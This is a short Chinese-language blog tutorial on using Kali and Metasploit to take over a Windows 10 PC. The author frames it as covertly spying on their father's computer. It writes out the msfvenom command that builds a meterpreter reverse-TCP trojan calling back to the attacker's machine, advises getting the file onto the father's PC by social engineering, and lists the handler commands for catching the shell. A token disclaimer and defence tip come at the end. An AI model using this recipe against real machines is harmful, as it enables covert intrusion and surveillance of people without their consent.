Kali MSF攻击Win10_kali攻击win10

本来周末想出去玩，但雾霾太严重，想着偷看我爸在看什么。

所以，我决定---用kali控制他的电脑!

0x00

首先下载kali，官网在Kali下载官网。

如果你的虚拟机是VM虚拟机，那么你下载VM图标的，其它虚拟机以此类推。

0x01

在虚拟机中运行kali后打开终端(Windows的cmd)，输入“ipconfig”查看IP地址。在kali终端中输入“ifconfig”查看IP地址。

我Windows的IP是192.168.1.1*，我kali的IP是192.168.1.*。

0x02

接下来可以开始了!

在kali终端输入以下代码，即可生成木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=端口 -f exe > shell.exe
 
我是:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.* LPORT=445 -f exe > shell.exe

运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件，把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去)，这一步就大功告成了!

0x03

在kali终端输入“msfconsole”打开MSF，分别输入以下代码：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost kali的IP
set lport 刚才木马的端口
show options
run

如果没有问题，它会打开监听，现在我们在Windows上运行木马文件，Windows如果没有任何反应，只是鼠标转圈圈，MSF输出了“meterpreter>“字样的时候，攻击就成功了!

总结

世界上没有绝对安全的系统，防范方法：谨慎现在文件，火绒报道不要忽略

MSF还可以利用漏洞，详情看MSF17-010漏洞利用​​​​​​

最后提醒大家：

所有未经授权的渗透，都是违法的!